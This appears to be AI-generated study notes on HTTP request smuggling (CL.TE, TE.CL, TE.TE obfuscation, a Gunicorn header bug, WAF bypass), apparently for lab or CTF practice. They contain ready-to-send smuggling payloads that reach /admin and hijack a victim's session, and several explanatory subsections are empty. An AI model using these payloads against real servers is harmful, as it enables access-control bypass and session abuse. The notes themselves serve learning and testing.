HTTP Smuggling

HTTP Request Smuggling Attack Methods

Attack Type Proxy Behavior Backend Behavior Key Header Used Test/Detect Steps Exploit Steps Impact
CL.TE Uses Content-Length Uses Transfer-Encoding Transfer-Encoding present 1. Send crafted POST with both headers. 2. Send second GET request. 3. If 405 or desync response → vulnerable Inject GET /admin request inside POST body using chunked format Admin request runs under victim's session
TE.CL Uses Transfer-Encoding Uses Content-Length Content-Length present 1. Send crafted POST with fake TE (asdchunked). 2. Observe 400 Bad Request on 2nd request Smuggle GET /admin in chunked body, using /404 as decoy Bypasses WAF blocking /admin
TE.TE Supports TE but ignores malformed TE Backend properly uses TE Obfuscated Transfer-Encoding 1. Obfuscate Transfer-Encoding using TAB, VT, or spacing. 2. Send two requests. 3. If 2nd request fails → vulnerable Place smuggled request using obfuscated TE, wait for admin to send normal GET Authenticated admin triggers attacker’s GET
Gunicorn Bug Not relevant (bug in server) Gunicorn ignores CL, fixes body to 8 bytes if Sec-WebSocket-Key1 is present Sec-WebSocket-Key1 1. Send GET with 49-byte body using 8x x, and smuggled GET /admin Gunicorn parses 2nd request as GET /admin due to bug Smuggled admin request bypasses WAF
Generic WAF Bypass Parses only 1st request Backend sees full request stream Any smuggled path in 2nd request 1. Use /404 or safe endpoint in initial line. 2. Smuggle sensitive endpoint inside body Bypass WAF filters by hiding /admin from proxy Access internal APIs or sensitive endpoints
Mass XSS via CL.TE Ignores TE Uses chunked parsing Chunked body 1. Inject XSS in smuggled GET. 2. Victim receives malformed payload Smuggled script injected in victim’s response Scalable XSS exploitation

1. CL.TE Request Smuggling

Concept

A CL.TE (Content-Length → Transfer-Encoding) vulnerability occurs when:

This mismatch leads to desynchronization, where the proxy and backend disagree on request boundaries.

sequenceDiagram
    participant Attacker
    participant Proxy (CL)
    participant Backend (TE)

    Note over Attacker: Sends request with both\nContent-Length and Transfer-Encoding
    Attacker->>Proxy (CL): POST / with CL=10 and TE: chunked\nBody: 0\r\n\r\nHELLO
    Note over Proxy (CL): Proxy doesn't support TE\nParses body using CL=10
    Proxy (CL)->>Backend (TE): Forwards entire 0\r\n\r\nHELLO
    Note over Backend (TE): Backend supports TE\nParses until chunk terminator 0\r\n\r\n
    Note over Backend (TE): Remaining 'HELLO' is interpreted\nas start of next request

Header Behavior

Component Behavior
Proxy Uses Content-Length
Backend Uses Transfer-Encoding: chunked
Result Proxy sends more than backend expects; leftover data becomes part of next request

Vulnerability Trigger

POST / HTTP/1.1
Host: target.site
Content-Length: 10
Transfer-Encoding: chunked

0

HELLO

Proxy View:

Backend View:


Desynchronization Example

Attacker sends:

POST / HTTP/1.1
Host: target.site
Content-Length: 10
Transfer-Encoding: chunked

0

HELLO

Victim sends:

GET / HTTP/1.1
Host: target.site

TCP Stream (Proxy View):

[Request 1]
POST / HTTP/1.1
Content-Length: 10
Transfer-Encoding: chunked

0

HELLO
[Request 2]
GET / HTTP/1.1
Host: target.site

TCP Stream (Backend View):

[Request 1]
POST / HTTP/1.1
Transfer-Encoding: chunked

0

[Request 2]
HELLOGET / HTTP/1.1
Host: target.site

The backend interprets the next method as HELLOGET, which is invalid. It returns an HTTP 405 Method Not Allowed.


Exploitation Scenario

Goal:

Force an authenticated user (e.g., an admin) to unknowingly perform an action like:

POST /api/promote_user?id=2 HTTP/1.1

Smuggling Payload:

POST / HTTP/1.1
Host: target.site
Content-Length: 52
Transfer-Encoding: chunked

0

POST /api/promote_user?id=2 HTTP/1.1
Dummy:

Victim Request (sent shortly after):

GET / HTTP/1.1
Host: target.site
Cookie: session=<user_session>

Proxy View:

POST / HTTP/1.1
Content-Length: 52
Transfer-Encoding: chunked

0

POST /api/promote_user?id=2 HTTP/1.1
Dummy:
GET / HTTP/1.1
Host: target.site
Cookie: session=<user_session>

Backend View:

POST / HTTP/1.1
Transfer-Encoding: chunked

0

POST /api/promote_user?id=2 HTTP/1.1
Dummy: GET / HTTP/1.1
Host: target.site
Cookie: session=<user_session>

The backend executes the smuggled admin request using the authenticated session of the victim.


Why Use Dummy:?


2. TE.CL Request Smuggling

Concept

A TE.CL (Transfer-Encoding → Content-Length) vulnerability occurs when:

Mermaid Diagram

sequenceDiagram
    participant Attacker
    participant Proxy (TE)
    participant Backend (CL)

    Note over Attacker: Sends request with TE and CL headers
    Attacker->>Proxy (TE): POST / with Transfer-Encoding: chunked\nContent-Length: 3
    Note over Proxy (TE): Parses chunked body correctly and forwards full request
    Proxy (TE)->>Backend (CL): Sends 5\\r\\nHELLO\\r\\n0\\r\\n\\r\\n
    Note over Backend (CL): Parses only first 3 bytes → 5\\r\\n\nLeaves HELLO in buffer
    Backend (CL)->>Backend (CL): Treats leftover HELLO as part of next request

Header Behavior

Component Behavior
Proxy Uses Transfer-Encoding
Backend Uses Content-Length
Result Backend reads leftover data as part of the next request

Vulnerability Trigger

POST / HTTP/1.1
Host: target.site
Content-Length: 3
Transfer-Encoding: chunked

5
HELLO
0

Proxy View:

Backend View:


Desynchronization Example

Request 1:

POST / HTTP/1.1
Host: target.site
Content-Length: 3
Transfer-Encoding: chunked

5
HELLO
0

Request 2:

GET / HTTP/1.1
Host: target.site

TCP Stream (Proxy View):

[Request 1]
POST / HTTP/1.1
Transfer-Encoding: chunked

5
HELLO
0
[Request 2]
GET / HTTP/1.1
Host: target.site

TCP Stream (Backend View):

[Request 1]
POST / HTTP/1.1
Content-Length: 3

5\r\n
[Request 2]
HELLO\r\n0\r\n\r\nGET / HTTP/1.1
Host: target.site

The backend appends the leftover data to the next request, resulting in an invalid or broken request.


Detection

  1. Configure Burp Suite to disable auto-updating of Content-Length.

  2. Send two requests via a single connection:

    • A malformed TE.CL request.

    • A follow-up GET request.

  3. If the second response returns 400 Bad Request, the target is vulnerable.


Exploitation Scenario: WAF Bypass

Goal:

Bypass a WAF that blocks URLs containing /admin.


Exploitation Payload 1 (smuggled request):

GET /404 HTTP/1.1
Host: target.site
Content-Length: 4
Transfer-Encoding: chunked

27
GET /admin HTTP/1.1
Host: target.site

0

Exploitation Payload 2 (filler):

GET /404 HTTP/1.1
Host: target.site

Proxy (WAF) View:

Backend View:


Why It Works


Optional Configuration Notes (for testing)


Key Takeaways

Concept Description
TE.CL Vulnerability Proxy uses chunked; backend uses CL
Trigger Remaining chunked data becomes a new request
Detection Send malformed chunked + GET → look for 400 Bad Request
Exploitation Technique Smuggle /admin behind harmless path like /404
Bypasses WAF WAF sees /404, backend sees /admin
Real-World Use Case Accessing restricted admin pages, bypassing security filters

3. TE.TE Request Smuggling

Concept

A TE.TE (Transfer-Encoding → Transfer-Encoding) vulnerability occurs when:

This discrepancy allows an attacker to exploit desynchronization by tricking the proxy or backend into parsing the request differently.


Header Behavior

Component Behavior
Proxy May ignore obfuscated Transfer-Encoding
Backend Parses Transfer-Encoding correctly
Result Proxy uses Content-Length, backend uses TE

Obfuscation Techniques

Method Header Example
Substring match Transfer-Encoding: testchunked
Space in header name Transfer-Encoding : chunked
Horizontal tab separator Transfer-Encoding:HTABchunked
Vertical tab separator Transfer-Encoding:VTABchunked
Leading space Transfer-Encoding: chunked

Note: HTAB is ASCII 0x09; VTAB is ASCII 0x0b.


Detection

  1. Craft a POST request using a Transfer-Encoding obfuscation technique.

  2. Immediately follow it with a GET request over the same TCP connection.

  3. If the second response returns 405 Method Not Allowed, desynchronization is confirmed.

Example Request (Detection):

POST / HTTP/1.1
Host: target.site
Content-Length: 10
Transfer-Encoding:	chunked  # Horizontal tab obfuscation

0

HELLO

Exploitation

Objective:

Force an authenticated user (e.g., admin) to trigger a backend request like:

GET /admin?reveal_flag=1 HTTP/1.1

Exploitation Payload:

POST / HTTP/1.1
Host: target.site
Content-Length: 46
Transfer-Encoding:	chunked  # Horizontal tab or vertical tab

0

GET /admin?reveal_flag=1 HTTP/1.1
Dummy:

Victim Request:

GET / HTTP/1.1
Host: target.site
Cookie: session=<user_session>

Why It Works


Timing Considerations


Key Takeaways

Concept Description
TE.TE Vulnerability Caused by inconsistent handling of obfuscated TE headers
Obfuscation Techniques Tabs, spacing, or string variations to evade proxy parsing
Detection 405 or invalid method errors on follow-up requests
Exploitation Technique Embed a second request after the chunk terminator
Timing Requirement Multiple attempts may be needed to align with the victim’s request timing
Real-World Use Case Stealthy privilege escalation or access to protected routes

Mermaid Diagram

sequenceDiagram
    participant Attacker
    participant Proxy (TE*)
    participant Backend (TE)

    Note over Attacker: Sends obfuscated Transfer-Encoding header
    Attacker->>Proxy (TE*): POST / with CL=46, obfuscated TE
    Note over Proxy (TE*): Proxy fails to detect TE, uses CL
    Proxy (TE*)->>Backend (TE): Forwards entire request
    Note over Backend (TE): Backend stops at chunk terminator (0)
    Backend (TE)->>Backend (TE): Interprets leftover GET as new request

4. Gunicorn (Sec-WebSocket-Key1 Bug)

Concept


Header Behavior

Component Behavior
Proxy Uses Content-Length normally
Backend Uses a hardcoded 8-byte body if Sec-WebSocket-Key1 is present
Result Extra bytes are interpreted as the next request

Detection

Send the following request via a single connection:

GET / HTTP/1.1
Host: target.site
Content-Length: 49
Sec-WebSocket-Key1: x

xxxxxxxxGET /404 HTTP/1.1
Host: target.site

Follow it with:

GET / HTTP/1.1
Host: target.site

If the second response is for /404, it indicates that the backend misaligned and parsed the embedded GET request separately.


Exploitation Payload

GET / HTTP/1.1
Host: target.site
Content-Length: 49
Sec-WebSocket-Key1: x

xxxxxxxxGET /admin HTTP/1.1
Host: target.site

Why It Works


Key Takeaways

Concept Description
Gunicorn Bug Triggered by Sec-WebSocket-Key1 header
Fixed Body Length Gunicorn always reads exactly 8 bytes as the request body
Exploitation Method Smuggle a second request right after 8 dummy bytes
Real-world Impact Can bypass WAFs or manipulate legitimate user requests

Mermaid Diagram

sequenceDiagram
    participant Attacker
    participant Proxy
    participant Gunicorn (Buggy)

    Attacker->>Proxy: GET / with CL=49 + Sec-WebSocket-Key1
    Proxy->>Gunicorn (Buggy): Full body including smuggled GET
    Gunicorn (Buggy)->>Gunicorn (Buggy): Reads 8 bytes only (xxxxxxxx)
    Note over Gunicorn (Buggy): Treats remainder as second request\n(GET /admin)

5. Generic WAF Bypass via Smuggling

Concept


CL.TE Payload

POST / HTTP/1.1
Host: vuln.site
Content-Length: 64
Transfer-Encoding: chunked

0

POST /admin HTTP/1.1
Host: localhost
Dummy:

GET / HTTP/1.1
Host: vuln.site
Content-Length: 4
Transfer-Encoding: chunked

35
GET /admin HTTP/1.1
Host: vuln.site

0

Why It Works


Key Takeaways

Concept Description
WAF Filtering Based on first request and visible URL paths
Smuggling Technique Use request boundary confusion to hide /admin from WAF
CL.TE Variant Proxy uses CL, backend sees chunked body containing /admin
TE.CL Variant Proxy uses chunked, backend uses CL, reads partial body, reveals /admin
Real-world Use Case Bypassing access control and reaching internal or restricted functionality

Mermaid Diagram

sequenceDiagram
    participant Attacker
    participant WAF Proxy
    participant Backend

    Attacker->>WAF Proxy: GET / with TE or CL headers
    WAF Proxy->>Backend: Smuggled payload hidden in body
    Note over Backend: Parses remaining request and executes GET /admin

Let me know if you’d like all 5 cases exported into a single printable file or Obsidian vault bundle.